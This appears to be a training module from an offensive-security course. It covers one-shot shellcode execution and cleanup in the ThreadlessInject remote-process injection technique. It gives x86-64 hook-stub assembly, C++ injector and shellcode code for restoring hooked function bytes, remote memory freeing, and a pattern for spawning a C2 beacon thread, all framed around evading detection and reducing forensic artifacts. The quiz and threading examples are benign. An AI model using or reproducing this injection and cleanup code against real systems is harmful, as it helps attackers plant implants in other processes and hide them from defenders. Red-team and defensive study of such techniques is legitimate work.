Module 7: Shellcode Execution & Cleanup
One-shot execution: run the payload once, then restore the hook and vanish.
The One-Shot Problem
ThreadlessInject is designed as a one-shot injection mechanism: the hook fires once, executes the shellcode payload, and then cleans itself up so the hooked function behaves normally again. If the hook stays active, the shellcode runs every time the function is called, which causes three problems. Initialization shellcode (such as a Cobalt Strike stager) crashes or misbehaves when run repeatedly, every call to the function pays added latency, and the persistent hook remains as a detection artifact.
Why One-Shot Matters
Most shellcode payloads (stagers, loaders, implant bootstraps) are designed to run exactly once. They perform initialization, spawn their own thread for the C2 communication loop, and return. If the hook stub calls the shellcode every time the hooked function is called, you get multiple initializations, multiple C2 connections, and likely crashes from double-initialization of global state.
| Scenario | Persistent Hook | One-Shot Hook |
|---|---|---|
| Shellcode execution count | Every call to hooked function | Exactly once |
| C2 connections | Multiple (one per trigger) | Single |
| Process stability | Degrades over time | Returns to normal |
| Detection window | Permanent hook artifact | Brief, then clean |
| Performance impact | Continuous overhead | One-time delay |
The Execution Guard: Preventing Re-Execution
There are several approaches to ensuring one-shot execution. The actual ThreadlessInject tool uses self-restoration: the loader stub writes the original function bytes back over the hook before calling the shellcode, so the hook is removed on first trigger and subsequent calls go straight to the original function. The injector process then polls the hooked function's bytes (via NtReadVirtualMemory) for up to 60 seconds to detect when the original bytes have been restored, confirming execution occurred.
An alternative approach (shown below for educational purposes) uses an execution guard flag stored in the allocated memory region. The hook stub checks this flag before calling the shellcode. On the first execution, the flag is clear, so the shellcode runs. The stub then sets the flag, and all subsequent invocations skip the shellcode call.
x86-64 ASM
; Modified hook stub with execution guard
hook_stub:
; Check the execution guard (a DWORD at a known offset in our memory region)
; The guard is initialized to 0 by the injector
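; Option A (atomic, see "Atomic Guard with LOCK CMPXCHG"): CMPXCHG compares EAX with the
; destination, so it needs EAX = 0 (expected value) and ECX = 1 (new value):
;   lock cmpxchg [rip + guard_offset], ecx ; ZF is set only for the thread that swaps 0 -> 1
; Options A and B are alternatives; a stub uses one or the other, not both.
; Option B (simpler, not thread-safe), used in the rest of this listing: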
mov eax, [rip + guard_offset] ; Read guard flag
test eax, eax ; Is it zero?
jnz skip_shellcode ; If non-zero, skip shellcode (already executed)
; Set the guard to 1 (prevent future executions)
mov dword ptr [rip + guard_offset], 1
; Save registers (same as Module 5)
push rax
push rcx
; ... (all registers saved)
pushfq
; Align stack and call shellcode
mov rbp, rsp
and rsp, -16 ; 16-byte align; the immediate sign-extends to 0xFFFFFFFFFFFFFFF0
sub rsp, 0x20
mov rax, shellcode_addr
call rax
; Restore registers
mov rsp, rbp
popfq
; ... (all registers restored)
pop rax
skip_shellcode:
; Execute original bytes (always, regardless of guard)
; [14 bytes of saved original prologue]
; Jump back to hooked function + 14
jmp [rip + 0]
dq original_func_plus_14
guard_offset:
dd 0 ; Initialized to 0, set to 1 after first execution
Atomic Guard with LOCK CMPXCHG
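For true thread safety, the guard check should be atomic. Multiple threads might call the hooked function simultaneously, and we need to guarantee that only one thread executes the shellcode. A separate read, test, and write leaves a window in which two threads can both read 0 before either writes 1. The LOCK CMPXCHG instruction closes that window with an atomic compare-and-swap: it compares the accumulator (EAX, preloaded with the expected value 0) against the guard and, if they match, stores the source operand (preloaded with 1) in a single atomic operation, setting ZF on success. Only the thread that successfully changes the guard from 0 to 1 proceeds to execute the shellcode; every other thread finds the guard already 1, has ZF cleared, and skips.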
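The compare-and-swap behavior described above can be observed in portable C++ without any hooking involved. The following is a minimal sketch, not code from ThreadlessInject: the helper name `count_guard_winners` is hypothetical, and the "one-time work" is just a counter increment. It races several threads against one guard and reports how many passed it.

```cpp
#include <atomic>
#include <cassert>
#include <cstddef>
#include <thread>
#include <vector>

// Hypothetical helper (illustration only): races `thread_count` threads
// against a single guard and returns how many observed the 0 -> 1 transition.
int count_guard_winners(int thread_count) {
    assert(thread_count > 0);
    std::atomic<int> guard{0};    // 0 = not yet executed, 1 = executed
    std::atomic<int> winners{0};  // threads that got past the guard

    std::vector<std::thread> threads;
    threads.reserve(static_cast<std::size_t>(thread_count));
    for (int i = 0; i < thread_count; ++i) {
        threads.emplace_back([&guard, &winners] {
            int expected = 0;
            // Atomic compare-and-swap: succeeds only while guard is still 0.
            // On x86-64, compilers typically emit LOCK CMPXCHG for this call.
            if (guard.compare_exchange_strong(expected, 1)) {
                winners.fetch_add(1);  // stand-in for the one-time work
            }
        });
    }
    for (auto& t : threads) {
        t.join();
    }
    return winners.load();
}
```

Calling `count_guard_winners(8)` should return 1 regardless of how the threads are scheduled, because only one compare-and-swap can see the guard at 0.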
Self-Restoration: Unhooking After Execution
The most thorough cleanup approach is to restore the original function bytes after the shellcode executes. This removes the hook entirely, so the function returns to its original unmodified state. There are two ways to accomplish this:
Approach 1: Shellcode Restores the Hook
The shellcode itself can restore the original bytes. In this variant, the injector passes the necessary information (hooked function address, original bytes, byte count) to the shellcode, which uses NtProtectVirtualMemory and memcpy to restore the prologue:
C++
// Shellcode-side restoration (running inside the target process)
// The shellcode has been given pointers to the original bytes and target address
void ShellcodeEntry(RESTORATION_INFO* info) {
// Step 1: Do the actual payload work (e.g., spawn beacon)
LoadAndExecutePayload();
// Step 2: Restore the hooked function's original bytes
ULONG oldProtect = 0;
PVOID addr = info->hookedFuncAddr;
SIZE_T size = 14;
// Make the code page writable again
NtProtectVirtualMemory(
GetCurrentProcess(), &addr, &size,
PAGE_EXECUTE_READWRITE, &oldProtect
);
// Copy original bytes back over the hook JMP
memcpy(info->hookedFuncAddr, info->originalBytes, 14);
// Restore original protection
NtProtectVirtualMemory(
GetCurrentProcess(), &addr, &size,
oldProtect, &oldProtect
);
}
Approach 2: Injector Monitors and Restores
Alternatively, the injector process can monitor for a signal that the shellcode has executed (e.g., by checking the guard flag in remote memory via NtReadVirtualMemory), then restore the original bytes from the injector side:
C++
// Injector-side restoration (running in the attacker's process)
// Poll the guard flag until shellcode has executed
printf("[*] Waiting for shellcode execution...\n");
DWORD guard = 0;
while (guard == 0) {
NtReadVirtualMemory(hProcess, guardFlagAddr, &guard, sizeof(guard), NULL);
Sleep(100); // Check every 100ms
}
printf("[+] Shellcode executed! Restoring original bytes...\n");
// Restore the original function prologue
PVOID protAddr = (PVOID)hookedFuncAddr;
SIZE_T protSize = 14;
ULONG oldProt = 0;
NtProtectVirtualMemory(hProcess, &protAddr, &protSize,
PAGE_EXECUTE_READWRITE, &oldProt);
NtWriteVirtualMemory(hProcess, (PVOID)hookedFuncAddr,
originalBytes, 14, NULL);
NtProtectVirtualMemory(hProcess, &protAddr, &protSize,
oldProt, &oldProt);
printf("[+] Hook removed, original function restored.\n");
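The polling loop above never gives up, whereas the description of the actual tool earlier in this module mentions a wait of up to 60 seconds. One way to express a bounded wait is to separate the deadline logic from whatever check is being polled. The following is a generic sketch under that assumption; `poll_until` is a hypothetical helper name, and the condition is an arbitrary callable rather than any particular memory read.

```cpp
#include <cassert>
#include <chrono>
#include <functional>
#include <thread>

// Hypothetical helper (illustration only): calls `condition` every `interval`
// until it returns true or `timeout` elapses.
// Returns true if the condition was observed before the deadline.
bool poll_until(const std::function<bool()>& condition,
                std::chrono::milliseconds timeout,
                std::chrono::milliseconds interval) {
    assert(interval.count() > 0);
    const auto deadline = std::chrono::steady_clock::now() + timeout;
    for (;;) {
        if (condition()) {
            return true;  // condition met, stop polling
        }
        if (std::chrono::steady_clock::now() >= deadline) {
            return false;  // timed out without seeing the condition
        }
        std::this_thread::sleep_for(interval);
    }
}
```

The condition is checked before each sleep, so a flag that is already set is reported without delay, and a caller can treat a `false` result as "never triggered" instead of hanging forever.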
[Figure: One-Shot Execution Timeline]
Memory Cleanup
After the hook is removed and the original function is restored, the allocated memory region (containing the hook stub and shellcode) remains in the target process. For a simple stager that spawns its own long-running thread, leaving it in place is acceptable: the stager code is no longer needed, but freeing the region while the spawned thread might still reference it risks a crash.
For a thorough cleanup, you can optionally free the memory:
C++
// Optional: Free the hook stub + shellcode memory
// Only safe if shellcode has fully bootstrapped and no longer needs the region
PVOID freeAddr = remoteBase;
SIZE_T freeSize = 0; // 0 means release the entire region
NtFreeVirtualMemory(
hProcess,
&freeAddr,
&freeSize,
MEM_RELEASE
);
// The remote memory region is now freed
// Warning: only do this if the shellcode has completed bootstrapping
Cleanup Trade-offs
Freeing the remote memory is ideal for stealth but risky for stability. If the shellcode allocated any structures that point back into the hook region, or if it spawned a thread that occasionally references the region, freeing the memory causes a use-after-free crash. In practice, many operators leave the memory allocated (it is small, typically a few kilobytes) and accept the minor forensic artifact. Private executable (RX) memory with no backing image file is itself a detection vector, but it is less conspicuous than an active hook on a function prologue.
Handling Shellcode That Blocks
Some shellcode payloads block (run for a long time or indefinitely) rather than quickly spawning a thread and returning. If your shellcode blocks, the thread that triggered the hook is stuck in the shellcode and never returns to the hooked function. This means:
- The thread that triggered the hook is hijacked permanently (or until the shellcode exits).
- The hooked function is effectively unavailable for that thread, potentially breaking the target application.
- The hook is never restored (if relying on the shellcode to restore it).
For this reason, well-designed shellcode for threadless injection should follow the pattern: spawn a new thread (or work item) for the long-running C2 loop, then return control to the hook stub immediately. This way, the hijacked thread resumes its normal operation within milliseconds.
C++
// Good shellcode pattern for threadless injection:
// Spawn a worker thread for the long-running payload, then return quickly
void ShellcodeEntry() {
// Quickly bootstrap: resolve CreateThread, allocate implant memory, etc.
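// ResolveAPI stands in for the payload's own import-resolution routine.
// The pointer gets its own name so it does not shadow the Win32 CreateThread declaration.
pCreateThread fnCreateThread = (pCreateThread)ResolveAPI("kernel32.dll", "CreateThread");
// Spawn the long-running C2 loop on a new thread
fnCreateThread(NULL, 0, BeaconMainLoop, NULL, 0, NULL);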
// Return immediately so the hook stub can restore registers
// and resume the hooked function
return;
}
// Total time on the hijacked thread: ~1ms for the bootstrap
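The "start the long-running work elsewhere, then return at once" shape is a general concurrency pattern and can be tried in standard C++ with no Windows APIs. The following is a minimal sketch, not the module's shellcode: `start_and_return` is a hypothetical name, and the returned future exists only so a caller or test can observe when the worker finishes.

```cpp
#include <cassert>
#include <functional>
#include <future>
#include <thread>
#include <utility>

// Hypothetical helper (illustration only): runs `long_running` on its own
// detached thread and returns immediately to the caller.
// The returned future becomes ready once the worker has finished.
std::future<void> start_and_return(std::function<void()> long_running) {
    assert(long_running);  // an empty callable would throw inside the worker
    std::packaged_task<void()> task(std::move(long_running));
    std::future<void> done = task.get_future();
    // Detach so the calling thread never waits on the worker.
    std::thread(std::move(task)).detach();
    return done;  // caller resumes its own work right away
}
```

Unlike a future obtained from `std::async`, the future of a `std::packaged_task` does not block in its destructor, so a caller that ignores the return value still gets control back immediately.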
The Clean State After Execution
When the one-shot pattern works correctly, the end state is remarkably clean: the shellcode has spawned its implant on a new thread (which looks like any other thread to the OS), the hooked function has been restored to its original bytes, and the only remaining artifact is the allocated memory region containing the now-inactive hook stub. Traditional injection, by contrast, leaves a thread whose start address points to VirtualAllocEx'd memory, so ThreadlessInject's forensic footprint is substantially smaller.
Pop Quiz: Execution & Cleanup
Q1: Why is one-shot execution important for ThreadlessInject?
Q2: How does LOCK CMPXCHG help with the execution guard?
Q3: Why should shellcode for threadless injection spawn a new thread and return quickly?